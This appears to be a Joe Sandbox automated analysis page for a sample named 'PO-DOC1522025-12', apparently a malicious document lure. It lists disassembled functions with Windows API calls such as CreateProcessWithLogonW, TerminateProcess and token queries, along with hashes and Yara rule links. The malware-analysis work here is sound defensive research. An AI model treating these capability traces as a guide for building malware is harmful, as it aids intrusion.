Opcode ID: 0ef6ac6a759d8bfe4c062760315d801c3526ab95543421da48a3f7ee0d61c3b1
Instruction ID: 1c728d131f191dae5faaf4d4a6b96bd8241c7f3d097ef284cb9c6d713fe3ffd5
Opcode Fuzzy Hash: 0ef6ac6a759d8bfe4c062760315d801c3526ab95543421da48a3f7ee0d61c3b1
Instruction Fuzzy Hash: 0CE1AF31908341CFD724DF24C885AAEB7E0BF95314F14896DF9999B2A2DB31DD06CB92

Function 0015920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2

BeginPaint.USER32(?,?,?), ref: 00159241
GetWindowRect.USER32(?,?), ref: 001592A5
ScreenToClient.USER32(?,?), ref: 001592C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001592D3
EndPaint.USER32(?,?,?,?,?), ref: 00159321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001971EA

Part of subcall function 00159339: BeginPath.GDI32(00000000), ref: 00159357

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 56f2443b5a2b27e95e3c2da249fb227a5a79e7e23c7562529c89cd88912b83ec
Instruction ID: 20186f4a64eb0482e4bc77d3d05a0de85db34e288e6a233ab7d8021b93973278
Opcode Fuzzy Hash: 56f2443b5a2b27e95e3c2da249fb227a5a79e7e23c7562529c89cd88912b83ec
Instruction Fuzzy Hash: 9E419F70105201EFDB11DF24DC88FBA7BB8EF65321F144669FA648B2E1C7319849DBA2

Function 001B07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 001B080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001B0847
EnterCriticalSection.KERNEL32(?), ref: 001B0863
LeaveCriticalSection.KERNEL32(?), ref: 001B08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001B08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 001B0921

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 3e671eadc394e576c343714f6dd93b493699aa9fdc4d15b32b9af62612f6e001
Instruction ID: 0dafaaaf3d78f8e631364f494d3261d669c39281e351c62efe325d4a91f05a46
Opcode Fuzzy Hash: 3e671eadc394e576c343714f6dd93b493699aa9fdc4d15b32b9af62612f6e001
Instruction Fuzzy Hash: 16416771900205EFDF15AF54DC85AAAB7B8FF08300F1480A9ED04AE297DB30DE65DBA0

Function 001D81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0019F3AB,00000000,?,?,00000000,?,0019682C,00000004,00000000,00000000), ref: 001D824C
EnableWindow.USER32(00000000,00000000), ref: 001D8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 001D82D1
ShowWindow.USER32(00000000,00000004), ref: 001D82E5
EnableWindow.USER32(00000000,00000001), ref: 001D830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001D832F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: b5d5814477cc91836cf6bd555fb2ea17b3e43efa04b5fd323e89504cc0577032
Instruction ID: 70b361ca79fb63bbb01dab63a1110f1b3388b43ece1a51c622d64a72028923c3
Opcode Fuzzy Hash: b5d5814477cc91836cf6bd555fb2ea17b3e43efa04b5fd323e89504cc0577032
Instruction Fuzzy Hash: 54418034602644AFDF25CF25DC99BE47BF1FB1A715F1842AAE6184B3A2CB31A851CB50

Function 001A4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 001A4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001A4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001A4CEA
_wcslen.LIBCMT ref: 001A4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001A4D10
_wcsstr.LIBVCRUNTIME ref: 001A4D1A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 4cc32e508c15eca87773caf0966847ed83ff11fb708232236ae7f0329dc52982
Instruction ID: 63bff3771583b6d758212c144afb416b464ce92d7a9fcd5a9c407969bb28dd19
Opcode Fuzzy Hash: 4cc32e508c15eca87773caf0966847ed83ff11fb708232236ae7f0329dc52982
Instruction Fuzzy Hash: EB213B35605201BBEB155B79DC0AEBB7B9CDF96760F10403EF809CA192DFA1DC41C2A0

Function 001B581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00143AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00143A97,?,?,00142E7F,?,?,?,00000000), ref: 00143AC2

_wcslen.LIBCMT ref: 001B587B
CoInitialize.OLE32(00000000), ref: 001B5995
CoCreateInstance.OLE32(001DFCF8,00000000,00000001,001DFB68,?), ref: 001B59AE
CoUninitialize.OLE32 ref: 001B59CC

Strings

.lnk, xrefs: 001B5876, 001B58C1, 001B5985

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: d2dd43933b6d7f7e268e185c60886679b523e3fa58f205b5355984636c26b5f6
Instruction ID: 465dcef2bec761cc446729eb2e2aaa5828e7ffa1e4fcec2ecfde571fef14fffb
Opcode Fuzzy Hash: d2dd43933b6d7f7e268e185c60886679b523e3fa58f205b5355984636c26b5f6
Instruction Fuzzy Hash: 4DD15371A087019FC714DF25C480A6ABBE2FF99714F14885DF88A9B3A1DB31ED45CB92

Function 001A175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001A0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001A0FCA
Part of subcall function 001A0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001A0FD6
Part of subcall function 001A0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001A0FE5
Part of subcall function 001A0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001A0FEC
Part of subcall function 001A0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001A1002

GetLengthSid.ADVAPI32(?,00000000,001A1335), ref: 001A17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 001A17BA
HeapAlloc.KERNEL32(00000000), ref: 001A17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 001A17DA
GetProcessHeap.KERNEL32(00000000,00000000,001A1335), ref: 001A17EE
HeapFree.KERNEL32(00000000), ref: 001A17F5

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 9fc60a273891cbe8f08ba23600f910ed88e668aa4fb8ec21fff32d14ee57d3bf
Instruction ID: 9233824b97e43039dd6206560ed50c20bf298fa234a953557d8246b5bb7bb808
Opcode Fuzzy Hash: 9fc60a273891cbe8f08ba23600f910ed88e668aa4fb8ec21fff32d14ee57d3bf
Instruction Fuzzy Hash: 0911BB7A602216FFDF109FE4CC49FAE7BA9EB46355F104419F481A7290C736A980CBA0

Function 001A14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001A14FF
OpenProcessToken.ADVAPI32(00000000), ref: 001A1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001A1515
CloseHandle.KERNEL32(00000004), ref: 001A1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001A154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 001A1563

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: d8770f432cfb10d96dd1f8736415a29e02b905b25c58b5ba2b393aeba456dff3
Instruction ID: 751cece25b181282f6cc7389158ff1a0d4f230db5077c05fa69436e24f8fad9a
Opcode Fuzzy Hash: d8770f432cfb10d96dd1f8736415a29e02b905b25c58b5ba2b393aeba456dff3
Instruction Fuzzy Hash: A311297650620ABBDF118FA8DD49BDE7BA9EF4A744F044515FA05A20A0C375CEA0DBA0

Function 00163382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00163379,00162FE5), ref: 00163390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0016339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001633B7
SetLastError.KERNEL32(00000000,?,00163379,00162FE5), ref: 00163409

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d584c2a2279176255687dcd74fd35c26c021689f67affab46e3fc37261be1425
Instruction ID: 14213ea198344c4c2d10f5439ea8380d50ec1da46598180dd96340ed6a840bcf
Opcode Fuzzy Hash: d584c2a2279176255687dcd74fd35c26c021689f67affab46e3fc37261be1425
Instruction Fuzzy Hash: 0901D432609311BEEA292775BC895776A95FB25379730032AF530812F1EF114E31D594

Function 00172D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00175686,00183CD6,?,00000000,?,00175B6A,?,?,?,?,?,0016E6D1,?,00208A48), ref: 00172D78
_free.LIBCMT ref: 00172DAB
_free.LIBCMT ref: 00172DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0016E6D1,?,00208A48,00000010,00144F4A,?,?,00000000,00183CD6), ref: 00172DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0016E6D1,?,00208A48,00000010,00144F4A,?,?,00000000,00183CD6), ref: 00172DEC
_abort.LIBCMT ref: 00172DF2

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: bb9f149a9a5b3820d6c0cbabfdab3c3d9fa29c76c9b97387269fec732e3031f2
Instruction ID: ca17791e81ac7f7d876e6cb6d0ed3a49a9a2120bda4251c7a95b7cfd6ed5e23b
Opcode Fuzzy Hash: bb9f149a9a5b3820d6c0cbabfdab3c3d9fa29c76c9b97387269fec732e3031f2
Instruction Fuzzy Hash: 99F0283190660137C63223B8FC0AE5A2679BFD67A0F25C519F82C932D2EF3088835160

Function 001D8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00159639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00159693
Part of subcall function 00159639: SelectObject.GDI32(?,00000000), ref: 001596A2
Part of subcall function 00159639: BeginPath.GDI32(?), ref: 001596B9
Part of subcall function 00159639: SelectObject.GDI32(?,00000000), ref: 001596E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001D8A4E
LineTo.GDI32(?,00000003,00000000), ref: 001D8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001D8A70
LineTo.GDI32(?,00000000,00000003), ref: 001D8A80
EndPath.GDI32(?), ref: 001D8A90
StrokePath.GDI32(?), ref: 001D8AA0

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 787e76599ef28169db259e38e70c7aa8e66302af84bb37a0f8376e7d78949290
Instruction ID: f2454bce6cc8d2b1fc4e116792ca53115b62eb05fd2c690babb87fb12f3a3368
Opcode Fuzzy Hash: 787e76599ef28169db259e38e70c7aa8e66302af84bb37a0f8376e7d78949290
Instruction Fuzzy Hash: 8911177600114DFFEF129F90EC88EEA7F6CEB08350F008422BA199A1A1C7719D95DFA0

Function 001A51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001A5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 001A5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A5230
ReleaseDC.USER32(00000000,00000000), ref: 001A5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 001A524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 001A5261

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 23f0b48c61f35c91e09b09e30ed5611a233648a20efd3fd474a263bffc3adbc1
Instruction ID: f5fa2e34d23a33b80722e441425945392f7a5c14b67d42afff1e193793b6f10d
Opcode Fuzzy Hash: 23f0b48c61f35c91e09b09e30ed5611a233648a20efd3fd474a263bffc3adbc1
Instruction Fuzzy Hash: CF018F75A02719BBEB109BA59C49B4EBFB8EF48751F044466FA04A7680D6709800CBA0

Function 00141BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00141BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00141BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00141C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00141C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00141C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00141C22

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 3df470a4c8971bf68d764f61c102369d32f54d12e3a180597862afff246dffa6
Instruction ID: 04f18855b94cbeee8cff9c74a0303c482cb0212186a562249e4aa1444964351e
Opcode Fuzzy Hash: 3df470a4c8971bf68d764f61c102369d32f54d12e3a180597862afff246dffa6
Instruction Fuzzy Hash: FB016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411B915C47A41C7F5A864CBE5

Function 001AEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001AEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001AEB46
GetWindowThreadProcessId.USER32(?,?), ref: 001AEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001AEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001AEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001AEB75

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: f6b43f29fd0ae545836bc3a053df73e543ec774e162d77a405ad738edfb1ba58
Instruction ID: 6d32b737476b859dd11ee4233c81d35ddbcd0b2afa69746fdacc5591ff5178e1
Opcode Fuzzy Hash: f6b43f29fd0ae545836bc3a053df73e543ec774e162d77a405ad738edfb1ba58
Instruction Fuzzy Hash: 79F09072143129BBEB205B529C0DEEF3B7CEFCAB11F00055AF601D1590D7A05A41C6F4

Function 00197439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00197452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00197469
GetWindowDC.USER32(?), ref: 00197475
GetPixel.GDI32(00000000,?,?), ref: 00197484
ReleaseDC.USER32(?,00000000), ref: 00197496
GetSysColor.USER32(00000005), ref: 001974B0

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: b632e64756e5327da3dd0ddcf82d0c42b09e81f69481a02c63331aa79159ce27
Instruction ID: 664456e0925b76c9df05c33d9e5f479b79725a5198737c4d5b93008ecd66bf3c
Opcode Fuzzy Hash: b632e64756e5327da3dd0ddcf82d0c42b09e81f69481a02c63331aa79159ce27
Instruction Fuzzy Hash: C2018B31506216EFDB105FA4EC08BEEBBB6FF04311F110561F925A35A1CB311E91EB91

Function 001A1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001A187F
UnloadUserProfile.USERENV(?,?), ref: 001A188B
CloseHandle.KERNEL32(?), ref: 001A1894
CloseHandle.KERNEL32(?), ref: 001A189C
GetProcessHeap.KERNEL32(00000000,?), ref: 001A18A5
HeapFree.KERNEL32(00000000), ref: 001A18AC

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: a203ea22ef358bf600f5cf768a4c904509b866a0bc5525d59ecfe0985be25ade
Instruction ID: eac9086b978282eb27bd35878d80d1d2663d3aa78684909bb9b9442383c5fed9
Opcode Fuzzy Hash: a203ea22ef358bf600f5cf768a4c904509b866a0bc5525d59ecfe0985be25ade
Instruction Fuzzy Hash: AAE0ED36046112FBDB016FA1ED0C905BF39FF497227108A22F225818B0CB3254A0DF90

Function 0014BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0014BEB3

Strings

D%!D%!, xrefs: 0014BCA5
D%!, xrefs: 0014BE9A
D%!, xrefs: 0014BCA2
D%!, xrefs: 0014BDED, 0014BD91, 0014BD1B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%!$D%!$D%!$D%!D%!
API String ID: 1385522511-4080940547
